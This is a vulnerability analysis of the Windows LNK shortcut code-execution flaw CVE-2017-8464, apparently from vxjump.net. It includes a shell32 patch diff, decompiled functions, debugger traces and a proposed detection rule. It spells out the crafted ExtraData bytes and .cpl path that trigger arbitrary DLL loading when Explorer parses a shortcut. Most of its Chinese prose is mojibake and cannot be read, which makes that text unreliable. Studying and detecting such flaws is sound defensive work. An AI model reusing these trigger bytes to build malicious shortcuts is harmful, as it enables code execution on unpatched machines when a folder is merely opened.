_ _ (_) | | __ ____ __ _ _ _ _ __ ___ _ __ _ __ ___ | |_ \ \ / /\ \/ /| || | | || '_ ` _ \ | '_ \ | '_ \ / _ \| __| \ V / > < | || |_| || | | | | || |_) |_ | | | || __/| |_ \_/ /_/\_\| | \__,_||_| |_| |_|| .__/(_)|_| |_| \___| \__| _/ | | | |__/ |_| /---------------------------------------------------------------------------------------\ |>................[ ITW 0day£ºLNKÔ¶³Ì´úÂëÖ´ÐЩ¶´£¨CVE-2017-8464£©µÄ¼òÒª·ÖÎö]..........<| |>......................[ by nEINEI/vxjump.net ]......................<| |>..........................[ 2017-06-28 ].........................<| \>..........................[ neineit@gmail.com ].........................------. | Shell Item Id List | | +---------------------------+ | | File location info | | +---------------------------+ | | Description string | | +---------------------------+ --- | Relative path string | Õ⼸¸ö½Ú²»ÊÇÿһ¸ö¶¼±ØÐë´æÔÚ£¬Èç¹û´æÔÚ¾ÍÒª°´ÕâÑùµÄ˳Ðò¹ØϵÅÅÁС£ +---------------------------+ --- | Working directory string | | +---------------------------+ | | Command line string | | +---------------------------+ | | Icon filename string | | +---------------------------+ >------. | Extra stuff | +---------------------------+ ºÍ±¾´Î©¶´ÓйصÄλÖÃÊÇ£¬ÊÇ1£© Shell Item Id List £¬ 2£©Extra stuff ¹ØÓÚLNKÎļþ¸ñʽµÄ½ÏÏêϸ½éÉÜÇë²Î¿¼£¬Ö®Ç°ÔÚVxjumpÉÏ·¢²¼µÄÎÄÕ£¬´Ë´¦²»ÔÙ׸Êö: http://www.vxjump.net/files/security_research/lnk_inf.txt һЩ°²È«¹«Ë¾Ìáµ½Õâ¸ö©¶´ºÍstuxnetÀûÓõÄCVE-2010-2568Ê®·ÖÏàÏñ£¬ÆäʵÊÇÓÐÒ»¶¨µÀÀíµÄ£¬¶¼ÊǺÍÀûÓÿØÖÆÃæ°å¿ì½Ý·½Ê½CPL¼ÓÔØÓйأ¬µ«ÓÖÓÐ Ò»¶¨µÄÇø±ð¡£ Ö÷ÒªÒòËØ»¹ÊÇÔÚShell Item Id List ²¿·Ö£¬Õⲿ·ÖÃèÊö¿ì½Ý·½Ê½µÄ·¾¶²¿·Ö¡£ ÀýÈ磬ÎÒÓÐÒ»¸öc:\a\b\c\x.jpg Îļþ£¬ÄÇôΪÕâ¸öÎļþ´´½¨Ò»¸ö¿ì½Ý·½Ê½ºó£¬»á²úÉúÒ»¸öshell Item ID list½á¹¹ Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000040 4B 01 14 00 K 00000050 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 PàO??i ¢Ø +0 00000060 30 9D 19 00 2F 43 3A 5C 00 00 00 00 00 00 00 00 0 /C:\ 00000070 00 00 00 00 00 00 00 00 00 00 00 44 00 31 00 00 D 1 00000080 00 00 00 E7 4A 01 73 10 00 61 00 34 00 09 00 04 çJ s a 4 00000090 00 EF BE E7 4A 01 73 E7 4A 01 73 2E 00 00 00 7A ï¾çJ sçJ s. z 000000A0 65 01 00 00 00 4F 02 00 00 00 00 00 00 00 00 00 e O 000000B0 00 00 00 00 00 DB B6 E5 00 61 00 00 00 10 00 44 Û¶?a D 000000C0 00 31 00 00 00 00 00 E7 4A 01 73 10 00 62 00 34 1 çJ s b 4 000000D0 00 09 00 04 00 EF BE E7 4A 01 73 E7 4A 01 73 2E ï¾çJ sçJ s. 000000E0 00 00 00 D3 65 01 00 00 00 20 01 00 00 00 00 00 Óe 000000F0 00 00 00 00 00 00 00 00 00 69 96 E5 00 62 00 00 i–å b 00000100 00 10 00 44 00 31 00 00 00 00 00 E7 4A C3 73 10 D 1 çJÃs 00000110 00 63 00 34 00 09 00 04 00 EF BE E7 4A 01 73 E7 c 4 ï¾çJ s? 00000120 4A C3 73 2E 00 00 00 E9 65 01 00 00 00 1F 00 00 JÃs. ée 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 EC BF 2D ì¿- 00000140 01 63 00 00 00 10 00 50 00 32 00 AE 3D 04 00 9F c P 2 ? ? 00000150 2F 00 80 20 00 78 2E 4A 50 47 00 3C 00 09 00 04 / € x.JPG < 00000160 00 EF BE E7 4A C1 73 E7 4A C1 73 2E 00 00 00 F2 ï¾çJÁsçJÁs. ? 00000170 65 01 00 00 00 64 00 00 00 00 00 00 00 00 00 00 e d 00000180 00 00 00 00 00 00 00 00 00 Õⲿ·Ö£¬¿ÉÒÔ±íʾΪһ¸ö½á¹¹ struct ShellItem{ DWORD size; SHITEMID item[1]; //ÕâÀï±íÃæÊÇÒ»¸ö¿É±äµÄ½Ú£¬Ëæ×ÅĿ¼µÄÔö¼ÓÕâÀï¿ÉÒÔÔö³¤ } typedef struct _SHITEMID { unsigned short int cb; //±¾½ÚµÄ³¤¶È unsigned char abID[0]; //¶¨ÒåÒ»¸ö¿É±äµÄ½á¹¹ }SHITEMID,*LPSHITEMID; ͨ³£À´½²£¬SHITEMID[0]´ú±íÎҵĵçÄÔ£¬ \x14\x00£¨ÕâÀïÊdz¤¶È£© \x1F £¨ÀàÐÍ£© \x50 £¨Î´Öª£© \xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30\x30\x9D£¨GUID£© ÉÏÃæGUIDת»»¹ýÀ´¾ÍÊÇHKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}£¬´ó¼Ò¿ÉÒÔÉÏ×Ô¼ºµÄµçÄÔÉϲéѯ¡£ ¿ì½Ý·½Ê½Ä¬ÈϵÄÉϲãĿ¼¶¼ÊÇ´ÓÕâÀ↑ʼ£¬°´ÕÕÕâ¸ö½á¹¹ÒÀ´ÎÑ°ÕÒ¿ÉÒÔÕÒ³ö\a , \b, \c £¬ x.jpg ¶ÔÓ¦µÄ SHITEMID[1]£¬SHITEMID[2]£¬SHITEMID[3]£¬SHITEMID[4]½á¹¹ÐÅÏ¢ ÄÇô£¬¶ÔÓÚ¿ØÖÆÃæ°åµÄ¿ì½Ý·½Ê½ÓÖ»áÓÐËù²»Í¬£¬SHITEMID[0] - ¶ÔÓ¦ÎҵĵçÄÔÐÅÏ¢£¬ SHITEMID[1] - ¶ÔÓ¦¿ØÖÆÃæ°åµÄGUIDÐÅÏ¢£¬Í¨³£ÊÇ\x19\x00\x2F\x43\x3A\x5C\x00\x00\x00\x00\x00\x00 SHITEMID[2] - ¶ÔÓ¦¾ßÌåµÄ¿ØÖÆÃæ°åcpl³ÌÐòÐÅÏ¢£¬±ê×¼¿ØÖÆÃæ°å¿ì½Ý·½Ê½»á°Ñ×ÔÉíµÄ·¾¶ÐÅÏ¢Ìí¼ÓÔÚExtra stuffÕⲿ·Ö½á¹¹ÖС£ ÀýÈ磬Äã´´½¨Ò»¸ö¿ØÖÆÃæ°åÖеÄAuto PlayµÄ¿ì½Ý·½Ê½£¬²é¿´Extra dataÕⲿ·ÖÐÅÏ¢£¬¿ÉÒÔ¿´µ½Ò»¸öGUID£¬²éѯһϾͿÉÒÔÖªµÀÊǶÔÓ¦Äĸöcpl¹¦ÄܳÌÐò Auto Play£º HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\ {9C60DE1E-E5FC-40f4-A487-460851A8D915} ¸ù¾Ý֮ǰ·ÖÎöCVE-2010-2568µÄ¾­Ñ飬©¶´µÄSHITEMID[1]Ìî³äÁË¿ØÖÆÃæ°åµÄGUIDÐÅÏ¢{21EC2020-3AEA-1069-A2DD-08002B30309D} SHITEMID[2]Ìí¼Ó¶ÔÓ¦µÄcpl³ÌÐò·¾¶¡£ ¸ù¾Ý·ÖÎö¶ÔCVE-2017-8464£¬µ¥´¿µÄÌí¼Ócpl³ÌÐòµÄ·¾¶ÐÅÏ¢ÊDz»»á´¥·¢Â©¶´µÄ£¬±ØÐë¹¹ÔìÌØÊâµÄÒ»¸öExtra dataÐÅÏ¢¡£ [0x03].²¹¶¡¶Ô±È ·ÖÎöƽ̨£ºwin7 x86 Îļþ£º shell32.dll (²¹¶¡Ç°£º6.1.7601.1892 £¬²¹¶¡ºó£º6.1.7601.23806) ͨ¹ýpath diff ¿ÉÒÔ¿´µ½Î¢ÈíÕâ´ÎÐÞ²¹Á˺ܶàµÄµØ·½£¬¸ù¾ÝÉϴξ­Ñé×ÔȻҪ²éѯCPL_LoadCPLModuleº¯Êý±»µ÷ÓõÄÇé¿ö£¬ ... CAutoComplete::_OnSearchComplete(SearchResults *,_DPA *) 738F086E CAutoComplete::_OnSearchComplete(SearchResults *,_DPA *) kfapi::CFolderRedirector::Redirect(_GUID const &,HWND__ *,ulong,ushort const *,_GUID const *,uint,ushort * *) 73B61419 kfapi::CFolderRedirector::Redirect(_GUID const &,HWND__ *,ulong,ushort const *,_GUID const *,uint,ushort * *) CopyStreamToFile(IStream *,ushort const *,unsigned __int64) 73B16E33 CopyStreamToFile(IStream *,ushort const *,unsigned __int64) CControlPanelFolder::_GetPidlFromAppletId(ushort const *,_ITEMID_CHILD * *) 73AF300B CControlPanelFolder::_GetPidlFromAppletId(ushort const *,_ITEMID_CHILD * *) CAutoComplete::_AppendNext(int) 73AA4538 CAutoComplete::_AppendNext(int) CAutoComplete::_AppendPrevious(int) 73AA460E CAutoComplete::_AppendPrevious(int) CGrep::_InitializeChunkBuffer(void) 73B9066F CGrep::_InitializeChunkBuffer(void) ... ÆäÖУ¬CControlPanelFolder::_GetPidlFromAppletId(ushort const *,_ITEMID_CHILD * *) µÄÐÞ²¹´úÂëÊǺÍCPL_LoadCPLModuleº¯ÊýÓйØϵ¡£ ºÜ¹Ø¼üµÄÒ»¸öµãÊÇÕâÀ if ( SHExpandEnvironmentStringsW(&Start, &v17, 260) ) { if ( CControlPanelFolder::_IsRegisteredCPLApplet(v11, &v17) ) // --- Ôö¼ÓÁËÒ»¸öУÑé { v12 = 0; v7 = CPL_LoadCPLModule(&v17, 0); if ( v7 ) { v13 = 0; do { v8 = (struct _DSA *)*((_DWORD *)v7 + 135); if ( v6 >= *(_DWORD *)v8 ) break; v9 = DSA_GetItemPtr(v8, v6); if ( v9 ) { v12 = IDControlCreate( ... } ÖÁ´Ë£¬ÎÒÃÇÒѾ­ÖªµÀ£¬¹Ø¼üÊÇÈçºÎ´¥·¢Õâ¸ö©¶´µÄ·¾¶£¬À´µ÷ÓÃCPL_LoadCPLModule£¬ÒòΪÈç¹û²»ÊǸô¦´æÔÚÎÊÌ⣬ÄÇô΢Èí²»»áÓÃ_IsRegisteredCPLAppletÀ´ ¹ýÂË£¬ÒòΪCVE-2010-2568Ò²ÊÇÓÃÕâ¸ö»úÖÆÀ´ÐÞ²¹µÄ¡£ [0x04].©¶´·ÖÎö һ·׷ËÝÎÒÃÇ¿ÉÒԵõ½Ò»¸ö´¥·¢Â·¾¶£º CControlPanelFolder::ParseDisplayName £¨IDAÖÐÎÞ·¨¿´µ½¾ßÌåµÄ¶ÔCControlPanelFolder::ParseDisplayNameµÄÒýÓã© --> CControlPanelFolder::_GetPidlFromAppletId -->CPL_LoadCPLModule ËùÒÔ£¬¶ÔCControlPanelFolder::ParseDisplayNameµÄµ÷ÓÃÓ¦¸ÃÊÇͨ¹ý¶¯Ì¬µÄ¶ÔÏóÐé±íº¯Êýµ÷ÓÃÀ´ÊµÏֵġ£ ÉèÖöϵãÔÚCControlPanelFolder::ParseDisplayName£¬ÈÎÒâ´ò¿ª´æÔÚ.lnkµÄÎļþĿ¼£¬ºÜÄÑ»ñµÃ´¥·¢¡£ËµÃ÷£¬Í¨³£µÄlnkÎļþÊÇȱÉÙijЩÐÅÏ¢»òÏàÓ¦×ֶβ»¶Ô¡£ ÀûÓÃCVE-2010-2568µÄÑù±¾×ö²âÊÔ£¬Ò²²»ÄÜ´¥·¢Õâ¸ö¶Ïµã¡£µ«´òÓ¡³öÖ´Ðз¾¶ÐÅʱÎÒ¿´ÁËһЩֵµÃ×¢ÒâµÄµØ·½£¬°´ÕÕ֮ǰÕâ¸ö©¶´µÄµ÷ÓûáÖ´ÐÐ _DecodeSpecialFolder¡£µ«Õâ¸öº¯Êýʵ¼ÊÉϲ¢Ã»Ö´ÐÐÍêÈ«¡£ 46 101 [ 2] SHLWAPI!SHReadDataBlockList 3 0 [ 3] SHLWAPI!__security_check_cookie eax = 0 48 104 [ 2] SHLWAPI!SHReadDataBlockList eax = 0 119 3446 [ 1] SHELL32!CShellLink::_LoadFromStream 16 0 [ 2] SHELL32!CShellLink::_DecodeSpecialFolder 11 0 [ 3] SHLWAPI!SHFindDataBlock eax = 0 22 11 [ 2] SHELL32!CShellLink::_DecodeSpecialFolder 11 0 [ 3] SHLWAPI!SHFindDataBlock eax = 0 27 22 [ 2] SHELL32!CShellLink::_DecodeSpecialFolder 5 0 [ 3] SHELL32!SHFree 8 0 [ 3] ole32!CoTaskMemFree 7 0 [ 4] ole32!CRetailMalloc_Free eax = 76b076bc 10 7 [ 3] ole32!CoTaskMemFree eax = 76b076bc 33 44 [ 2] SHELL32!CShellLink::_DecodeSpecialFolder 3 0 [ 3] SHELL32!__security_check_cookie eax = 76b076bc void __thiscall CShellLink::_DecodeSpecialFolder(CShellLink *this) { CShellLink *v1; // esi@1 int v2; // eax@1 int v3; // edi@1 signed int v4; // eax@3 signed int v5; // eax@5 int v6; // ecx@5 char *v7; // edi@7 unsigned int v8; // ebx@7 int i; // eax@7 bool v10; // zf@9 const ITEMIDLIST *v11; // eax@13 ITEMIDLIST *v12; // ebx@14 ITEMIDLIST *v13; // edi@15 int v14; // eax@15 int v15; // esi@15 int v16; // eax@15 int v17; // eax@20 int v18; // edi@20 const struct _ITEMIDLIST_RELATIVE *pidl; // [sp+Ch] [bp-Ch]@7 ITEMIDLIST *pidla; // [sp+Ch] [bp-Ch]@13 LPITEMIDLIST v21; // [sp+10h] [bp-8h]@1 v21 = 0; v1 = this; v2 = SHFindDataBlock(*((_DWORD *)this + 57), 0xA000000B); v3 = v2; if ( v2 ) //Èç¹û²éÕҳɹ¦£¬ÄÇô»á¼ÌÐø£¬·ñÔòÊÍ·ÅILFree(pidla); { if ( !CShellLink::_ShouldDecodeSpecialFolder(v1, (const struct _GUID *)(v2 + 8)) ) goto LABEL_19; v4 = 0x4000; if ( *((_DWORD *)v1 + 65) & 0x400000 ) v4 = 20480; v5 = SHGetKnownFolderIDList(v3 + 8, v4, 0, &v21); v6 = *(_DWORD *)(v3 + 24); } else { v17 = SHFindDataBlock(*((_DWORD *)v1 + 57), 0xA0000005); v18 = v17; if ( !v17 ) goto LABEL_19; v21 = SHCloneSpecialIDList(0, *(_DWORD *)(v17 + 8), 0); v6 = *(_DWORD *)(v18 + 12); v5 = v21 != 0 ? 0 : -2147024882; } ÏÔÈ»£¬SHFindDataBlockÊÇʧ°ÜµÄ£¬ÒòΪȱÉÙËýËùÒªËÑË÷µÄDataBlock,²é¿´LNKÎļþÊÖ²á¿ÉÒÔ¿´µ½£¬ÀïÃæÌáµ½ÁËExtra Data½á¹¹£¬ ÀïÃæÉæ¼°Á˺ܶà½á¹¹ºÍÆäÇ©ÃûÐÅÏ¢£¬ÏÔʾÉÏÃæµ÷ÓÃʱµÄ²ÎÊý¾ÍÊÇÆäÇ©ÃûÐÅÏ¢£¬0xA0000005£¬0xA000000B ConsoleDataBlock - 0xA0000002 ConsoleFEDataBlock - 0xA0000004 EnvironmentVariableDataBlock - 0xA0000001 IconEnvironmentDataBlock - 0xA0000007 PropertyStoreDataBlock - 0xA0000009 SpecialFolderDataBlock - 0xA0000005 £¨ÉÏÎĺ¯ÊýÖÐÌáµ½µÄ²ÎÊý£© KnownFolderDataBlock - 0xA000000B £¨ÉÏÎĺ¯ÊýÖÐÌáµ½µÄ²ÎÊý£© ËùÒÔ£¬¿ÉÒÔÔÚCVE-2010-2568Ñù±¾µÄ»ù´¡ÉÏ£¬Ìí¼ÓÒ»¸öExtraDataÊý¾Ý£¬ÒÀ´ÎÌí¼ÓSpecialFolderDataBlockºÍKnownFolderDataBlockʵÑé¡£ ¾ßÌåµÄ¸ñʽ£º struct KnownFolderDataBlock{ DWORD BlockSize; DWORD BlockSignature; CHAR GUID[16]; DWORD offset; } KnownFolderDataBlock£º \x1C\x00\x00\x00\x0B\x00\x00\xA0\x19\x27\x6D\x74\x59\x74\x6A\x2D\x63\x1A\x9D\x7f\x63\x24\x8C\x6D\x00\x00x00\x03 ÖмäµÄGUID¾ßÌåÖ¸ÏòÔõÑùµÄÌØÊâµÄÎļþIDÆ䣬ÎĵµÀïÃæËƺõûÓнéÉÜÇå³þ£¬Ö»Äܹ¹ÔìÒѾ­´æÔÚµÄһЩGUID£¬·´¸´²âÊÔ£¬Ã»Óгɹ¦£¨Èç¹ûÓвâÊԳɹ¦µÄÅóÓÑ£¬»¹ÇëÖ¸µã£©¡£ ¶ÔÓÚSpecialFolderDataBlock½á¹¹Ïà¶Ô¼òµ¥Ò»Ð©£¬ struct SpecialFolderDataBlock{ DWORD BlockSize; DWORD BlockSignature; DWORD ID; DWORD offset; } Ìí¼ÓÕâЩÊý¾Ý£º\x10\x00\x00\x00\x05\x00\x00\xA0\x03\x00\x00\x00\x28\x00\x00\x00\x00\x00 ×¢ÒâÕâÀïÃæµÄ0x28£¬¸ù¾ÝÊÖ²á˵Ã÷ÊÇoffset£¬ A 32-bit, unsigned integer that specifies the location of the ItemID of the first child segment of the IDList specified by SpecialFolderID. This value is the offset, in bytes, into the link target IDList. ÕâÀïÎÒ¼ÆËãµÄÊÇSHITEMID[2] - SHITEMID[0] Ö®¼äµÄ²îÖµ¡£ ÕâÑù£¬Äã¾Í¿ÉÒÔ¿´µ½.lnkÎļþ±»¼ÓÔصÄcall stackl. Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000080 00 00 00 6A 00 00 00 00 00 00 05 01 05 01 46 00 j F 00000090 3A 00 5C 00 2E 00 5C 00 2E 00 5C 00 2E 00 5C 00 : \ . \ . \ . \ 000000A0 2E 00 5C 00 2E 00 74 00 65 00 73 00 74 00 2E 00 . \ . t e s t . 000000B0 63 00 70 00 6C 00 00 00 c p l ×îÖÕ¼ÓÔصÄÇé¿ö: SHExpandEnvironmentStringsW»á»ñµÃϵͳĿ¼ºÍºóÃæµÄĿ¼ƴ½ÓΪһ¸öϵͳ·¾¶ SHELL32!CControlPanelFolder::_GetPidlFromAppletId+0x160: 75ec3da3 50 push eax 0:017> db eax 0583cde4 43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00 C.:.\.W.i.n.d.o. 0583cdf4 77 00 73 00 5c 00 73 00-79 00 73 00 74 00 65 00 w.s.\.s.y.s.t.e. 0583ce04 6d 00 33 00 32 00 5c 00-2e 00 74 00 65 00 73 00 m.3.2.\...t.e.s. 0583ce14 74 00 2e 00 63 00 70 00-6c 00 2c 00 00 00 15 09 t...c.p.l.,..... 0583ce24 38 ce 83 05 18 6f a0 76-d8 ed 15 09 70 f4 c6 75 8....o.v....p..u 0583ce34 53 00 6f 00 66 00 74 00-77 00 61 00 72 00 65 00 S.o.f.t.w.a.r.e. 0583ce44 5c 00 4d 00 69 00 63 00-72 00 6f 00 73 00 6f 00 \.M.i.c.r.o.s.o. 0583ce54 66 00 74 00 5c 00 57 00-69 00 6e 00 64 00 6f 00 f.t.\.W.i.n.d.o. 0:013> kv ChildEBP RetAddr Args to Child 0499d114 75ec3f52 08ec3a48 0499d21c 75c70180 SHELL32!CControlPanelFolder::_GetPidlFromAppletId+0x181 (FPO: [Non-Fpo]) 0499d140 75c5799b 08cabc38 00000000 08d5a800 SHELL32!CControlPanelFolder::ParseDisplayName+0x49 (FPO: [Non-Fpo]) 0499d1c4 75c5f0af 090ddaac 00000000 08d5a800 SHELL32!CRegFolder::ParseDisplayName+0x93 (FPO: [Non-Fpo]) 0499d238 75c606cd 090de3dc 00347098 75c7a660 SHELL32!ReparseRelativeIDList+0x137 (FPO: [Non-Fpo]) 0499d27c 75c60715 00000000 00347070 08ead300 SHELL32!TranslateAliasWithEvent+0xa6 (FPO: [Non-Fpo]) 0499d294 75c2e84e 00347070 08ead300 05c06258 SHELL32!TranslateAlias+0x15 (FPO: [Non-Fpo]) 0499d2c0 75c2e5e3 00000000 00000000 05d5e0c8 SHELL32!CShellLink::_DecodeSpecialFolder+0xf9 (FPO: [Non-Fpo]) 0499e584 75beca18 08f4c6d8 00000000 00000000 SHELL32!CShellLink::_LoadFromStream+0x39f (FPO: [Non-Fpo]) 0499e7b4 75bec987 0499e840 00000000 0499e7f0 SHELL32!CShellLink::_LoadFromFile+0x90 (FPO: [Non-Fpo]) 0499e7c4 75bec8dc 05d5e0dc 0499e840 00000000 SHELL32!CShellLink::Load+0x32 (FPO: [Non-Fpo]) 0499e7f0 75bec933 05d5e0d0 0499e840 00000000 SHELL32!InitializeFileHandlerWithFile+0x6a (FPO: [Non-Fpo]) 0499ea4c 75c38be0 00000000 0499eaa0 00000002 SHELL32!CFileSysItemString::HandlerCreateInstance+0x168 (FPO: [Non-Fpo]) 0499eb04 75c42626 00000000 00000000 00000000 SHELL32!CFileSysItemString::LoadHandler+0x16b (FPO: [Non-Fpo]) 0499efb4 75c42674 00000000 00000001 0499f00c SHELL32!CFSFolder::_BindHandler+0x1d1 (FPO: [Non-Fpo]) 0499efd4 75bf9aa6 09058198 00000000 00000001 SHELL32!CFSFolder::GetUIObjectOf+0x21 (FPO: [Non-Fpo]) 0499f490 75c3128d 09058180 05b4c0b8 05b4c0b8 SHELL32!CFSFolder::_GetPerceivedType+0x60 (FPO: [Non-Fpo]) 0499f4b0 75c371fd 00000000 05b4c0b8 05b4c0b8 SHELL32!CFSFolder::_GetInnateDetailsFromHelper+0x47 (FPO: [Non-Fpo]) 0499f4e0 75c31398 00000000 05b4c0b8 75c632ac SHELL32!CFSFolder::_GetInnateDetailsWithHandlerExceptions+0x61 (FPO: [Non-Fpo]) 0499f4fc 75c3134c 05b4c0b8 75c632ac 0499f578 SHELL32!CFSFolder::_GetInnateDetails+0x18 (FPO: [Non-Fpo]) 0499f538 75c312e9 05b4c0b8 75c632ac 0499f578 SHELL32!CFSFolder::_GetInnateDetailsAsVariant+0x41 (FPO: [Non-Fpo]) 0499f580 75c0e197 09058198 05b4c0b8 75c632ac SHELL32!CFSFolder::GetDetailsEx+0x40 (FPO: [Non-Fpo]) 0499f5b0 75c0ed8d 09058198 05b4c0b8 09056584 SHELL32!GetPerceivedType+0x44 (FPO: [Non-Fpo]) 0499f5f8 75c0dc3a 0499f61c 08d6d4e0 09056584 SHELL32!GetFolderTypeFromItems+0xd8 (FPO: [Non-Fpo]) 0499f63c 75c0d99c 08d6d4e0 09056584 09058198 SHELL32!CEnumTask::_CalculateFolderType+0x2f (FPO: [Non-Fpo]) 0499f698 75c09e63 09058198 0499f6f0 0499f6ec SHELL32!CEnumTask::_IncrFillEnumToView+0x192 (FPO: [Non-Fpo]) 0499f6f8 75c09fcd 09058198 00000001 755f81eb SHELL32!CEnumTask::_IncrEnumFolder+0x2b5 (FPO: [Non-Fpo]) 0499f73c 75c38226 09056550 01000000 80000000 SHELL32!CEnumTask::InternalResumeRT+0x325 (FPO: [Non-Fpo]) 0499f75c 75c761fb 09056564 7fffffff 05cb7708 SHELL32!CRunnableTask::Run+0xce (FPO: [Non-Fpo]) 0499f778 75c78a8b 0499f7b4 00000000 090b62d8 SHELL32!CShellTask::TT_Run+0x167 (FPO: [Non-Fpo]) 0499f7c0 75c78bbf 0499f7d8 7753b2b1 05cb7708 SHELL32!CShellTaskThread::ThreadProc+0xa3 (FPO: [Non-Fpo]) 0499f7c8 7753b2b1 05cb7708 03de89a8 0499f84c SHELL32!CShellTaskThread::s_ThreadProc+0x1b (FPO: [Non-Fpo]) 0499f7d8 773dd7c4 090b62d8 7322bf39 03de89a8 SHLWAPI!ExecuteWorkItemThreadProc+0xe (FPO: [Non-Fpo]) ΢ÈíµÄÐÞ¸´·½Ê½ÊÇÔÚ_IsRegisteredCPLAppletÖÐÅжϣ¬´«ÈëµÄÒª¼ÓÔصÄDLL·¾¶ºÍĬÈÏ´æÔÚµÄ.cpl·¾¶ÊÇ·ñÏà·û£¬Èç¹ûÊäÈëµÄ·¾¶²»´æÔÚÓÚ°×Ãûµ¥ÖУ¬ÄÇô·µ»Ø false£¬²»¼ÓÔØÈκÎDLL¡£ ¶ÔÓÚ²¹¶¡µÄº¯Êý£º ËûÒªÅжÏÊÇ·ñ´æÔÚÓÚÒ»¸öÁбíÖС£ ÏÈ»ñµÃµÚÒ»¸öÔªËØ£¬È»ºóÒÀ´Î±È½Ï£º 76f136bb ff30 push dword ptr [eax] ds:0023:067f1170=038bf1a0 0:002> db 038bf1a0 038bf1a0 43 00 3a 00 5c 00 50 00-52 00 4f 00 47 00 52 00 C.:.\.P.R.O.G.R. 038bf1b0 41 00 7e 00 31 00 5c 00-4d 00 49 00 46 00 35 00 A.~.1.\.M.I.F.5. 038bf1c0 42 00 41 00 7e 00 31 00-5c 00 4f 00 66 00 66 00 B.A.~.1.\.O.f.f. 038bf1d0 69 00 63 00 65 00 31 00-34 00 5c 00 4d 00 4c 00 i.c.e.1.4.\.M.L. 038bf1e0 43 00 46 00 47 00 33 00-32 00 2e 00 43 00 50 00 C.F.G.3.2...C.P. 038bf1f0 4c 00 00 00 00 00 05 10-66 a6 ec 53 ff ff 00 8c L.......f..S.... 038bf200 57 00 69 00 6e 00 64 00-6f 00 77 00 73 00 20 00 W.i.n.d.o.w.s. . 038bf210 77 00 69 00 6c 00 6c 00-20 00 69 00 6e 00 73 00 w.i.l.l. .i.n.s. µÚ¶þ´ÎÑ­»· 0:002> db 0692e7d0 0692e7d0 43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00 C.:.\.W.i.n.d.o. 0692e7e0 77 00 73 00 5c 00 73 00-79 00 73 00 74 00 65 00 w.s.\.s.y.s.t.e. 0692e7f0 6d 00 33 00 32 00 5c 00-77 00 73 00 63 00 75 00 m.3.2.\.w.s.c.u. 0692e800 69 00 2e 00 63 00 70 00-6c 00 00 00 6c 00 00 00 i...c.p.l...l... 0692e810 33 f7 4b 53 01 00 00 80-14 00 4c 00 45 00 33 00 3.KS......L.E.3. 0692e820 43 00 42 00 46 00 39 00-32 00 41 00 33 00 34 00 C.B.F.9.2.A.3.4. 0692e830 36 00 46 00 33 00 34 00-30 00 42 00 31 00 39 00 6.F.3.4.0.B.1.9. 0692e840 31 00 35 00 38 00 43 00-32 00 35 00 42 00 43 00 1.5.8.C.2.5.B.C. µÚÈý´Î£º 0:002> db poi(eax) 0384a9c0 43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00 C.:.\.W.i.n.d.o. 0384a9d0 77 00 73 00 5c 00 73 00-79 00 73 00 74 00 65 00 w.s.\.s.y.s.t.e. 0384a9e0 6d 00 33 00 32 00 5c 00-46 00 6c 00 61 00 73 00 m.3.2.\.F.l.a.s. 0384a9f0 68 00 50 00 6c 00 61 00-79 00 65 00 72 00 43 00 h.P.l.a.y.e.r.C. 0384aa00 50 00 4c 00 41 00 70 00-70 00 2e 00 63 00 70 00 P.L.A.p.p...c.p. 0384aa10 6c 00 00 00 00 00 6e 00-ea 57 13 53 73 00 00 80 l.....n..W.Ss... 0384aa20 32 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 2............... 0384aa30 01 00 00 00 00 00 00 00-a0 71 60 06 e8 95 a5 76 .........q`....v ÕâÑù¼´±ã³¢ÊÔ¼ÓÔØ·¾¶£¬Ò²»áÒòΪ²»ÔÙ°×Ãûµ¥Öжø±»¾Ü¾ø¼ÓÔØ¡£ [0x05].¹ØÓÚ¼ì²â ÒªÏë×öµ½Í¨Óõļì²â¸Ã©¶´£¬ÐèÒªÊÇÕë¶Ôshell item id listµÄ·Ç³£¹æµÄ¸ñʽ¼ì²â SHITEMID[0] = \x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30\x9D SHITEMID[1] = \x2E\x1E\x20\x20\xEC\x21\xEA\x3A\x69\x10\xA2\xDD\x08\x00\x2B\x30\x30\x9D ÁíÍ⣬Õë¶ÔExtraDtat ExtraData.BlockSize = 0x00000010 ExtraData.BlockSignature = 0xA0000005 ¼ì²âÂß¼­ÈçÏ£º if(SHITEMID[0] == "\x1f \x50 ..." & SHITEMID[1] = "\x2e \x1f ...") { if(SHITEMID[2] in (".\\" || ".dll")) { if(ExtraData.BlockSize = 0x00000010 && ExtraData.BlockSignature = 0xA0000005) { alert("Found CVE-2017-8464 Vulnerability\n"); } } } [0x06].ÆäËü ÏÞÓÚ¶ÔKnownFolderDataBlockÁ˽âµÄȱ·¦¼°Ïà¹Øµ÷ÓõĸüÉîÈë·ÖÎö£¬²»ÄÜÈ·¶¨KnownFolderDataBlockÊÇ·ñÒ²Ò»¶¨ºÍÕâ¸ö©¶´´æÔÚ¹ØÁª£¬µ«ÏÔȻ΢Èí ÐÞ²¹Õâ¸ö©¶´µÄ·½·¨ÊÇ»ùÓÚ°×Ãûµ¥¹ýÂ˵ģ¬¼´±ãKnownFolderDataBlockÒ²¿ÉÒÔ±»ÀûÓô¥·¢£¬µ«»¹ÊDz»»á¼ÓÔسɹ¦µÄ¡£ [²Î¿¼ÎÄÏ×] [MS-SHLLINK]-160714.pdf https://msdn.microsoft.com/en-us/library/dd891343.aspx